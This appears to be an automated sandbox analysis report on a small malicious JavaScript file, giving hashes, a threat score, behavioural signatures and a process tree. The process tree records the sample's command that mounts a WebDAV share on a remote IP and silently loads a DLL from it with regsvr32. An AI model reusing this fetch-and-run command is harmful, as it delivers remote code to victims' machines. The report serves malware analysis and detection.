Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
21/07/2024, 17:42
Static task
static1
Behavioral task
behavioral1
Sample
20466548826943425.js
Resource
win7-20240704-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
20466548826943425.js
Resource
win10v2004-20240709-en
5 signatures
150 seconds
General
-
Target
20466548826943425.js
-
Size
4KB
-
MD5
8cb7a8557ff98e9bd76d5abaccff5318
-
SHA1
40f7830ccd7edf1dc587f3cb12bd3857edb74f47
-
SHA256
1b89b34a19d94f1f3c7f9013e22882b2446280e9313e092a2ee374fd2f0e3590
-
SHA512
bbfa6df64d52fe3dacf04df09705b1f9141aa38c1b0464dac685d184b39e531a4fea10e7b5b9522c74a50b9bf96f8fdd62869ded2ea9eda0671ca21b3ad376c8
-
SSDEEP
96:5fz/RzH0200+ZZz0Y+okOeKfCAkyPKfCm:9RH0200+/z0Y+o9eJAkyPJm
Score
7/10
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3000 wrote to memory of 4072 3000 wscript.exe 84 PID 3000 wrote to memory of 4072 3000 wscript.exe 84 PID 4072 wrote to memory of 4088 4072 cmd.exe 86 PID 4072 wrote to memory of 4088 4072 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\20466548826943425.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\610575116832.dll2⤵
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:4088
-
-